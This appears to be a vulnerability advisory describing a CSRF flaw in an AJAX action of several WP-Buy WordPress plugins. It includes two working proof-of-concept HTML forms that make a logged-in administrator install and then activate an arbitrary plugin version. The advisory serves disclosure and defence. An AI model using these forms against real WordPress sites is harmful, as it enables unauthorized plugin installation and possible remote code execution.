The "cp_plugins_do_button_job_later_callback" AJAX action, from multiple plugins of the WP-Buy vendor, was lacking CSRF check, allowing attackers to make a logged in administrator install and active arbitrary plugins (including specific version) from the WordPress repository which could lead to more critical vulnerabilities like RCE.
Installation: <html> <body> <form action="https://example.com/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="do_button_job_later" /> <input type="hidden" name="slug" value="wpscan.1.14.4" /> <input type="submit" name="submit" value="submit" /> </form> </body> </html> Activation: <html> <body> <form action="https://example.com/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="do_button_job_later" /> <input type="hidden" name="plugin_file" value="wpscan/wpscan.php" /> <input type="submit" name="submit" value="submit" /> </form> </body> </html>
2021-04-22 (about 1 years ago)
2021-04-22 (about 1 years ago)
2021-04-22 (about 1 years ago)